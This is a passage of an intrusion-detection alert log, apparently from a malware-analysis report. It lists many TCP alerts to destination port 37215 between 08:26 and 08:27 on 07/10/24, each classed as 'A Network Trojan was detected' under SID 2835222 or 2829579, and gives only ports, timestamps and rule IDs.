                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587668
                  SID:2835222
                  Source Port:60348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.996552
                  SID:2835222
                  Source Port:49962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129654
                  SID:2835222
                  Source Port:35466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.070289
                  SID:2829579
                  Source Port:38660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.926621
                  SID:2835222
                  Source Port:50656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819736
                  SID:2835222
                  Source Port:38038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.064971
                  SID:2835222
                  Source Port:39560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.693119
                  SID:2835222
                  Source Port:55044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395459
                  SID:2835222
                  Source Port:50678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.234090
                  SID:2829579
                  Source Port:57880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273288
                  SID:2835222
                  Source Port:59752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002361
                  SID:2829579
                  Source Port:47286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.386874
                  SID:2835222
                  Source Port:45646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.829336
                  SID:2835222
                  Source Port:41398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.516790
                  SID:2835222
                  Source Port:45152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.611968
                  SID:2829579
                  Source Port:52276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344412
                  SID:2835222
                  Source Port:54500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.550813
                  SID:2829579
                  Source Port:36170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.805928
                  SID:2829579
                  Source Port:39344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.482822
                  SID:2829579
                  Source Port:37384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.939164
                  SID:2829579
                  Source Port:42188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.161022
                  SID:2829579
                  Source Port:39582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.853209
                  SID:2829579
                  Source Port:41648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.361562
                  SID:2835222
                  Source Port:43418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.330211
                  SID:2835222
                  Source Port:51572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134395
                  SID:2835222
                  Source Port:35358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.822075
                  SID:2829579
                  Source Port:49194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.764270
                  SID:2835222
                  Source Port:50464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939725
                  SID:2829579
                  Source Port:49080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.873449
                  SID:2835222
                  Source Port:42772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.177891
                  SID:2835222
                  Source Port:40770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.886878
                  SID:2835222
                  Source Port:42420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.735455
                  SID:2829579
                  Source Port:39108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667245
                  SID:2829579
                  Source Port:58400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997634
                  SID:2829579
                  Source Port:36812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.154328
                  SID:2835222
                  Source Port:43482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.394204
                  SID:2829579
                  Source Port:40688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.155297
                  SID:2835222
                  Source Port:49400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.371632
                  SID:2835222
                  Source Port:46388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617808
                  SID:2829579
                  Source Port:35728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2835222
                  Source Port:45558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.864255
                  SID:2829579
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.264063
                  SID:2835222
                  Source Port:35464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.832636
                  SID:2835222
                  Source Port:60010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985311
                  SID:2829579
                  Source Port:50110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188191
                  SID:2835222
                  Source Port:52888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.133115
                  SID:2835222
                  Source Port:34824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561854
                  SID:2829579
                  Source Port:57298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.162688
                  SID:2829579
                  Source Port:52278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259692
                  SID:2829579
                  Source Port:42756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867822
                  SID:2829579
                  Source Port:41372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.494095
                  SID:2829579
                  Source Port:56838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.856924
                  SID:2829579
                  Source Port:46366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.439991
                  SID:2835222
                  Source Port:50036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.966535
                  SID:2835222
                  Source Port:41624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.212811
                  SID:2829579
                  Source Port:33046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.544307
                  SID:2835222
                  Source Port:35980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622208
                  SID:2829579
                  Source Port:59774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.773467
                  SID:2835222
                  Source Port:51098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.051778
                  SID:2829579
                  Source Port:59930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2829579
                  Source Port:53960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.070048
                  SID:2829579
                  Source Port:55128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.685620
                  SID:2829579
                  Source Port:34348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865429
                  SID:2835222
                  Source Port:41494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819736
                  SID:2835222
                  Source Port:41476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001692
                  SID:2829579
                  Source Port:34994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.595344
                  SID:2829579
                  Source Port:35416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.301991
                  SID:2829579
                  Source Port:46112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.418203
                  SID:2835222
                  Source Port:52674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.657807
                  SID:2829579
                  Source Port:49862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.017676
                  SID:2835222
                  Source Port:34906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.980089
                  SID:2829579
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2835222
                  Source Port:40906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.210553
                  SID:2835222
                  Source Port:57458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.864771
                  SID:2835222
                  Source Port:56620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.266655
                  SID:2829579
                  Source Port:51944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.766466
                  SID:2835222
                  Source Port:60408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.050359
                  SID:2835222
                  Source Port:36552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936738
                  SID:2829579
                  Source Port:45986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.401393
                  SID:2829579
                  Source Port:46860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.949584
                  SID:2835222
                  Source Port:57544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.985222
                  SID:2829579
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.872945
                  SID:2835222
                  Source Port:36462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597215
                  SID:2829579
                  Source Port:38992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926271
                  SID:2829579
                  Source Port:33462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.787394
                  SID:2829579
                  Source Port:57628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303289
                  SID:2829579
                  Source Port:58692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.417902
                  SID:2835222
                  Source Port:59108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.795103
                  SID:2829579
                  Source Port:33908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.685142
                  SID:2829579
                  Source Port:56964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.895617
                  SID:2829579
                  Source Port:49936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.778513
                  SID:2829579
                  Source Port:56880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470125
                  SID:2829579
                  Source Port:58892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.200878
                  SID:2829579
                  Source Port:38590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234133
                  SID:2829579
                  Source Port:49172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.554660
                  SID:2835222
                  Source Port:37898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006056
                  SID:2835222
                  Source Port:41972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624887
                  SID:2829579
                  Source Port:46350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.410615
                  SID:2829579
                  Source Port:59270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699441
                  SID:2829579
                  Source Port:35428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.922659
                  SID:2829579
                  Source Port:48132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238024
                  SID:2835222
                  Source Port:46772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.498447
                  SID:2835222
                  Source Port:36856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.627157
                  SID:2829579
                  Source Port:39854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.150804
                  SID:2829579
                  Source Port:54618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.557054
                  SID:2835222
                  Source Port:51050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.550214
                  SID:2829579
                  Source Port:60222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.033407
                  SID:2829579
                  Source Port:56916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.537516
                  SID:2835222
                  Source Port:47718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.375796
                  SID:2829579
                  Source Port:41300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861688
                  SID:2835222
                  Source Port:41864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994983
                  SID:2835222
                  Source Port:56596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996261
                  SID:2835222
                  Source Port:33768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147329
                  SID:2835222
                  Source Port:60130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989759
                  SID:2835222
                  Source Port:47136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.626550
                  SID:2829579
                  Source Port:40718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.138787
                  SID:2835222
                  Source Port:59488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2835222
                  Source Port:47328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211996
                  SID:2835222
                  Source Port:37646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929262
                  SID:2835222
                  Source Port:44982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.784387
                  SID:2835222
                  Source Port:44350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.921580
                  SID:2829579
                  Source Port:50706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.528287
                  SID:2835222
                  Source Port:49434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.285342
                  SID:2835222
                  Source Port:57714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.453421
                  SID:2829579
                  Source Port:48692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.028864
                  SID:2829579
                  Source Port:45448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.565464
                  SID:2835222
                  Source Port:52804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083690
                  SID:2835222
                  Source Port:43304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.833151
                  SID:2829579
                  Source Port:46880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.867670
                  SID:2835222
                  Source Port:60208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211472
                  SID:2829579
                  Source Port:37682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234133
                  SID:2829579
                  Source Port:57128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.845766
                  SID:2835222
                  Source Port:42924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.558089
                  SID:2835222
                  Source Port:46280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.109836
                  SID:2829579
                  Source Port:48156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.877444
                  SID:2829579
                  Source Port:56010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.837578
                  SID:2829579
                  Source Port:57110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412388
                  SID:2829579
                  Source Port:37418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318439
                  SID:2835222
                  Source Port:48056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.833709
                  SID:2835222
                  Source Port:33144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857576
                  SID:2829579
                  Source Port:60492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526577
                  SID:2835222
                  Source Port:46352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.573653
                  SID:2835222
                  Source Port:58622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.596939
                  SID:2829579
                  Source Port:55636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278007
                  SID:2835222
                  Source Port:40590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083120
                  SID:2835222
                  Source Port:48270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.871233
                  SID:2835222
                  Source Port:43748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021127
                  SID:2835222
                  Source Port:55000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.238530
                  SID:2835222
                  Source Port:53240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.286064
                  SID:2829579
                  Source Port:49812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.243243
                  SID:2829579
                  Source Port:45714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807348
                  SID:2829579
                  Source Port:35784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.549796
                  SID:2829579
                  Source Port:60026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.858579
                  SID:2829579
                  Source Port:57350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609490
                  SID:2835222
                  Source Port:38432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.009286
                  SID:2835222
                  Source Port:47762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208952
                  SID:2829579
                  Source Port:47526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.591499
                  SID:2829579
                  Source Port:49494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.566526
                  SID:2829579
                  Source Port:36014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758837
                  SID:2835222
                  Source Port:45530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.145999
                  SID:2829579
                  Source Port:46654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.538222
                  SID:2829579
                  Source Port:49444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175593
                  SID:2829579
                  Source Port:38692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.910332
                  SID:2835222
                  Source Port:52228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.878182
                  SID:2829579
                  Source Port:40154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.383706
                  SID:2835222
                  Source Port:35316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.879518
                  SID:2835222
                  Source Port:49320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.708629
                  SID:2829579
                  Source Port:55990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.959053
                  SID:2829579
                  Source Port:39654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811319
                  SID:2829579
                  Source Port:47920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.210866
                  SID:2829579
                  Source Port:34762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.176670
                  SID:2829579
                  Source Port:51112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.897778
                  SID:2829579
                  Source Port:37494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.198321
                  SID:2835222
                  Source Port:37302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.746894
                  SID:2829579
                  Source Port:34200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.445688
                  SID:2835222
                  Source Port:43264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.144364
                  SID:2829579
                  Source Port:52618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.349242
                  SID:2829579
                  Source Port:34998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.663157
                  SID:2829579
                  Source Port:48920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868019
                  SID:2829579
                  Source Port:50374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.856940
                  SID:2829579
                  Source Port:52096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.846786
                  SID:2829579
                  Source Port:46424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.871233
                  SID:2835222
